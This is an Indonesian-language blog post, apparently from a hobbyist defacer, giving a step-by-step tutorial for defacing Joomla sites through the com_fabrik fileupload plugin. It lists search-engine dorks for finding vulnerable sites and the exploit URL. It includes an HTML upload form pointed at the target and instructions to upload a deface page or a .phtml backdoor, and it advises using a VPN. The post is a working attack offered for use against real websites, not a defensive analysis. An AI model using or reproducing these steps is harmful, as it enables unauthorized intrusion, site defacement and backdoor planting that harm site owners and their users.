Hae ketemu lagi sama saya MR.A_404 orang paling ganteng oke kali ini saya akan membagikan tutorial deface metode com_fabrik dengan csrf :-)
Bahan :
• Dork :
- inurl:index.php?option=com_fabrik
- /index.php?option=com_fabrik site:
- option=com_fabrik&format=raw site:
- com_fabrik site:
- /component/fabrik/ site:
- kembangkan lagi hingga dapat site
• Exploit :
Target.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
• csrf
<form method="POST" action="http://www.target.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"> <input type="file" name="file" /> <button> Upload </button> </form>
( save dengan format html )
• script deface
( Download Script TuanA )
• vpn dan internet yang kerad
Langkah :
1). Ngedorking dulu
2). Pilih target yang mau kalian uwe dan Masukkan exploit nya
3). Jika website vuln maka akan seperti ini
4). Edit csrf tadi ubahlah http://www.target.co.li menjadi web target kalian save lalu buka
5). Upload file .html kalian atau bisa juga backdoor format .phtml
6). Jika berhasil terupload maka akan seperti ini dan akses lah dengan cara www.target.co.li/namafile.html
7). Website terdeface :-)
Sekian dari saya MR.A_404 yang gans
1 Comments
Hai
ReplyDelete